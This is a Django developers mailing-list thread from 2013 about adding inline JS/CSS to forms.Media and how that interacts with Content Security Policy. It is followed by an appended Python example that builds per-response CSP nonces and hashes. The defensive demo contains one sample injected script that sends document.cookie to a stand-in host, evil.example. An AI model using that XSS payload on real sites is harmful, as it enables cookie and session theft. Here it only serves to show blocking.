Re CSP: It's more or less fine to start using it. It still needs a clean API for configuring it, but it's pretty solid.

However, a newish feature that has been added is the ability to allow _some_ inline scripts but not all. Sadly, this feature doesn't have widespread support yet. The other thing about CSP is that policies are defined per response, so a page that uses inline scripts could be allowed them while another page isn't.

On May 15, 2013, at 6:28 PM, Aymeric Augustin <[email protected]> wrote:

> On 14 May 2013, at 02:36, Derek Payton <[email protected]> wrote:
>
>> I have a working patch with tests and docs for #13978, which would add the
>> ability to have inline JS and CSS in forms.Media. I feel that this ticket is
>> a much better solution than, e.g., scattering the required inline media
>> throughout your templates. However, the issue was raised that this goes
>> against the W3C's Content Security Policy. Per Julian's recommendation, I am
>> bringing this here for consideration.
>>
>> Ticket: https://code.djangoproject.com/ticket/13978
>
> Disclaimer: I'm certainly not the most qualified person when it comes to
> frontend, but since this message didn't get an answer, here's one.
>
> Hi Derek,
>
> https://github.com/dmpayton/django/commit/a676b609004863dd726332df865b9ead7487767e
> looks fairly reasonable to me.
>
> CSP doesn't look ready for general consumption just yet, at least judging by
> the first two lines of django-csp's docs:
>
>> Content-Security-Policy is a complicated header. There are many values you
>> may need to tweak here.
>>
>> It's worth reading the latest CSP spec and making sure you understand it
>> before configuring django-csp.
>
> Different sites have different security requirements; for instance, a site
> where only admins can edit stuff is generally immune to XSS. I don't think
> the existence of CSP in its current state is a sufficient reason to reject
> this ticket.
>
> A minor suggestion: InlineJS/CSS sounds even more explicit than
> EmbeddedJS/CSS.
>
> I left a few other questions on GitHub. I don't expect a long answer; I just
> want to make sure you've considered them.
>
> --
> Aymeric.
>
> --
> You received this message because you are subscribed to the Google Groups
> "Django developers" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to [email protected].
> To post to this group, send email to [email protected].
> Visit this group at http://groups.google.com/group/django-developers?hl=en.
> For more options, visit https://groups.google.com/groups/opt_out.
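The feature the reply above refers to, allowing some inline scripts but not all, is CSP's script nonces and hashes (introduced with CSP 1.1), and the per-response point is why a nonce has to be minted fresh for every response rather than once per site. The following is an added example, not code from this thread, from Django or from django-csp: it builds a per-response policy, tags inline JS (such as a form widget's media) with the response nonce or allowlists it by hash, and approximates the browser's allow/block decision so the difference between a tagged widget script and an injected, untagged one is visible. All function names and the sample JS strings are constructed for illustration; the check is a simplification of the spec's matching rules, not a browser implementation.

```python
import base64
import hashlib
import secrets
from typing import Iterable, Optional


def new_nonce(nbytes: int = 16) -> str:
    """Unguessable per-response nonce. Mint a fresh one for every response;
    a reused or predictable nonce lets injected markup carry a valid one."""
    return base64.b64encode(secrets.token_bytes(nbytes)).decode("ascii")


def script_hash(source: str) -> str:
    """CSP hash-source for an inline script body: sha256 of the exact bytes
    between <script> and </script>, base64-encoded (whitespace matters)."""
    digest = hashlib.sha256(source.encode("utf-8")).digest()
    return "sha256-" + base64.b64encode(digest).decode("ascii")


def build_csp(nonce: str, inline_hashes: Iterable[str] = ()) -> str:
    """Header value for one response: scripts may come from our own origin,
    from <script nonce=...> tags carrying this response's nonce, or from
    inline bodies whose hash is listed (e.g. fixed widget JS from forms.Media)."""
    script_src = ["'self'", f"'nonce-{nonce}'"] + [f"'{h}'" for h in inline_hashes]
    return "; ".join(
        [
            "default-src 'self'",
            "script-src " + " ".join(script_src),
            "style-src 'self'",
        ]
    )


def render_inline_script(source: str, nonce: str) -> str:
    """Inline <script> tag that the policy built above will allow."""
    return f'<script nonce="{nonce}">{source}</script>'


def parse_csp(policy: str) -> dict:
    """'name src src; name src' -> {name: [src, ...]} (hypothetical helper)."""
    directives = {}
    for part in policy.split(";"):
        tokens = part.strip().split()
        if tokens:
            directives[tokens[0].lower()] = tokens[1:]
    return directives


def inline_script_allowed(policy: str, source: str, nonce: Optional[str] = None) -> bool:
    """Approximate the browser's decision for one inline script under a policy.

    The script runs only if script-src (or default-src as fallback) lists
    'unsafe-inline' (every inline script, which is what nonces/hashes let you
    avoid), a 'nonce-...' matching the tag's nonce attribute, or a 'sha256-...'
    hash matching the script body. When any nonce or hash source is present,
    'unsafe-inline' is ignored, so an injected script without the nonce is
    blocked even on a policy that keeps 'unsafe-inline' for older browsers.
    """
    directives = parse_csp(policy)
    sources = directives.get("script-src", directives.get("default-src", []))
    has_nonce_or_hash = any(
        s.startswith(("'nonce-", "'sha256-", "'sha384-", "'sha512-")) for s in sources
    )
    if "'unsafe-inline'" in sources and not has_nonce_or_hash:
        return True
    if nonce is not None and f"'nonce-{nonce}'" in sources:
        return True
    return f"'{script_hash(source)}'" in sources


def demo() -> dict:
    """Two responses, two nonces: a widget's inline JS tagged with the current
    response's nonce runs; an untagged (injected) script and a script reusing
    the previous response's nonce do not. Sample JS is constructed, not Django's."""
    widget_js = "initDatePicker('#id_date');"
    injected_js = "new Image().src='//evil.example/?c='+document.cookie;"

    previous_nonce = new_nonce()  # nonce from an earlier response
    nonce = new_nonce()           # nonce for the response being rendered now
    policy = build_csp(nonce)
    return {
        "tagged_widget": inline_script_allowed(policy, widget_js, nonce),
        "untagged_injection": inline_script_allowed(policy, injected_js),
        "stale_nonce": inline_script_allowed(policy, injected_js, previous_nonce),
        "hash_allowlisted": inline_script_allowed(
            build_csp(nonce, [script_hash(widget_js)]), widget_js
        ),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {'allowed' if ok else 'blocked'}")
```

The hash route suits media that is fixed at deploy time, since any change to the script body (including whitespace) changes the hash; the nonce route suits JS that varies per response, at the cost of threading the nonce from the view that sets the header to every template fragment that emits an inline tag.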
